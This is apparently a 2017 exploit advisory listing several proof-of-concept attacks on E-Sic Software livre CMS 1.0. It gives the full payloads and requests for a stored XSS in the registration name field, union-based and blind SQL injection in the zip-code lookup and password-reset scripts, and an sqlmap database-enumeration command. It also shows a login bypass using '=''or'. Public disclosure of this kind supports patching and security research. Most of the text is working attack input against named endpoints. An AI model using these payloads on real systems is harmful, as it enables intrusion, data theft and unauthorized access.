E-Sic Software livre CMS 1.0 Cross Site Scripting / SQL Injection
Posted on 13 October 2017
# Exploit Title: E-Sic Software livre CMS - Cross Site Scripting # Date: 12/10/2017 # Exploit Author: Elber Tavares # fireshellsecurity.team/ # Vendor Homepage: https://softwarepublico.gov.br/ # Version: 1.0 # Tested on: kali linux, windows 7, 8.1, 10 - Firefox # Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar # More informations: http://whiteboyz.xyz/esic-software-publico-xss.html O XSS estA! presente na A!rea de cadastro de solicitante, onde A(c) possivel injetar cA3digos pelo input que recebe o nome do usuA!rio --------------------------------------------------------------------- Url: http://localhost/esic/index/ POST: http://localhost/cadastro/index.php DATA: DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E& cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=& idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com& confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=& uf=&numero=&complemento=&acao=Salvar # Exploit Title: E-Sic Software livre CMS - Sql Injection # Date: 12/10/2017 # Exploit Author: Elber Tavares # fireshellsecurity.team/ # Vendor Homepage: https://softwarepublico.gov.br/ # Version: 1.0 # Tested on: kali linux, windows 7, 8.1, 10 - Firefox # Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar # More informations: http://whiteboyz.xyz/esic-software-publico-sql-injection.html Vulnerability is in the zip code search script --------------------------------------------------------------------- Url: http://localhost/esiclivre/restrito/inc/buscacep.php DATA: Parameter: f (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr Type: UNION query Title: MySQL UNION query (random number) - 6 columns Payload: f=test' UNION ALL SELECT 3344,3344, CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71), 3344,3344,3344# # Exploit Title: E-Sic Software livre CMS - Blind SQL Injection # Date: 12/10/2017 # Exploit Author: Guilherme Assmann # Vendor Homepage: https://softwarepublico.gov.br/ # Version: 1.0 # Tested on: kali linux, windows 7, 8.1, 10 - Firefox # Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar # More informations: https://k33r0k.wordpress.com/2017/10/12/e-sic-sql-injection/#more-398 The vulnerability is in the search private area of e-sic without authentication --------------------------------------------------------------------- Poc: Url: http://vulnerable/esiclivre/restrito/inc/lkpcep.php?q=1 Parameter: q (GET) Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)-- UACx sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs # Exploit Title: E-Sic Software livre CMS - Sql Injection # Date: 12/10/2017 # Exploit Author: Elber Tavares # fireshellsecurity.team/ # Vendor Homepage: https://softwarepublico.gov.br/ # Version: 1.0 # Tested on: kali linux, windows 7, 8.1, 10 - Firefox # Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar # More informations: http://whiteboyz.xyz/esic-software-publico-sql-injection.html vulnerability is in the password reset parameter of the software, where we can send sql parameters and interact directly with the database. "Informe seu CPF ou CNPJ para enviarmos nova senha:" --------------------------------------------------------------------- Url: http://vulnerablesite/esic/reset/ POST: cpfcnpj=test&btsub=Enviar Parameter: cpfcnpj (POST) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL-- GJkR&btsub=Enviar # Exploit Title: E-Sic Software livre CMS - Autentication Bypass # Date: 12/10/2017 # Exploit Author: Elber Tavares # Vendor Homepage: https://softwarepublico.gov.br/ # Version: 1.0 # Tested on: kali linux, windows 7, 8.1, 10 - Firefox # Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar # More informations: http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html The vulnerability is in the login area of aae-sic, where we can enter the panel only using some parameters such as username and password --------------------------------------------------------------------- PoC: Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or' POST: http://vulnsite/esic/index/index.php DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar
